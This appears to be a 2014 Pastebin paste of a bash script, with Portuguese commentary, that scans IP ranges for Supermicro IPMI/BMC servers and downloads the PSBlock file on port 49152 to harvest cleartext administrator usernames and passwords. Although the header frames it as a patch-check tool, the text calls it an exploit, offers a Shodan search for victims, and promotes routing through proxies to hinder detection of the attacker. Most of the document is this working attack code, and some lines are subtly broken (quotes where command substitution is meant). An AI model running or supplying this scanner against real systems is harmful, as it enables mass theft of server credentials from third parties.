SHARE
TWEET

[SCRIPT]=> Supermicro IPMI/BMC Cleartext Password Scanner

Googleinurl Aug 19th, 2014 1,209 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Supermicro IPMI/BMC Cleartext Password Scanner v20140622
  3. # Seguranca da Informacao VB/CG
  4. # Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
  5. #
  6. # ABOUT:
  7. # Supermicro's implementation of IPMI/BMC allows remote, unauthenticated attackers to
  8. # request the file PSBlock via port 49152. This plain text password file contains IPMI
  9. # username and password information. This script allows users to scan their networks
  10. # check for vulnerable systems that require patching.
  11. #
  12. # Como Utilizar:
  13. # ./supermicro_scan.sh 74.200.8.237 -- Single host scan
  14. # ./supermicro_scan.sh 74.200.0.0/16 proxy -- Subnet scan with proxy
  15. # ./supermicro_scan.sh showdan -- Search for vulnerable servers on ShowdanHQ
  16. #
  17. /*
  18. Scanner de Falhas em Servidores Supermicro IPMI/BMC
  19. Como sabemos há poucos dias foi descoberta uma falha que expõe mais de 32 mil senhas  administrativas dos servidores que utilizam a motherboard da Supermicro, estas senhas estão expostas com acesso pela porta 49152.
  20.  
  21. Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
  22. Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.
  23.  
  24. Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ
  25.  
  26. Basta copiar o codigo abaixo e colar em um arquivo com o nome supermicro_scan.sh
  27.  
  28. Lembrando Este script é para utilizadores de LINUX.
  29.  
  30. FONTE: http://virusbrasil.com.br/?p=106
  31. */
  32.  
  33.  
  34.  
  35.  
  36. clear
  37. echo "--==== Seguranca da Informacao VB/CG"
  38. echo "--==== Supermicro IPMI Cleartext Password Scanner"
  39. echo ""
  40. UNICORNSCAN='which unicornscan'
  41. CURL='which curl'
  42. PROXYCHAINS='which proxychains'
  43. TARGET=$1
  44. PROXY=$2
  45. if [ "$UNICORNSCAN" == "" ]; then
  46. echo "--==== Unicornscan nao instalado Saindo …"
  47. exit
  48. fi
  49. if [ "$PROXYCHAINS" == "" ]; then
  50. echo "--==== Proxychains nao instalado varredura Continuando sem suporte a proxy…"
  51. exit
  52. fi
  53. if [ "$CURL" == "" ]; then
  54. echo "--==== Curl nao esta instalado! Saindo …"
  55. exit
  56. fi
  57. if [ -z "$1" ]; then
  58. echo "--==== Usage: $0 <CIDR|IP> [proxy]"
  59. exit
  60. fi
  61. if [ $TARGET == "shodan" ]; then
  62. # SCAN USING SHODANHQ SEARCH
  63. echo "Buscando ShowdanHQ…"
  64. iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
  65. exit
  66. fi
  67. if [ "$PROXY" = "proxy" ]; then
  68. #PROXY ENABLED
  69. echo "--==== Scanning via proxy…"
  70. # SCAN FOR THE DEFAULT FILES AND PORTS
  71. for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
  72. echo "--==== Extraindo Usuario e senha from $a"
  73. echo "--==== Sending GET http://$a:49152/PSBlock"
  74. proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
  75. done
  76. exit
  77. else
  78. # NO PROXY
  79. echo "--==== Scanning via conexao direta…"
  80. # SCAN FOR THE DEFAULT FILES AND PORTS
  81. for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
  82. echo "--==== Extraindo usuario e senha from $a"
  83. echo "--==== Sending GET http://$a:49152/PSBlock"
  84. curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
  85. done
  86. exit
  87. fi
  88. echo ""
  89. echo "--==== Scan Completo!"
  90. exit
RAW Paste Data
Top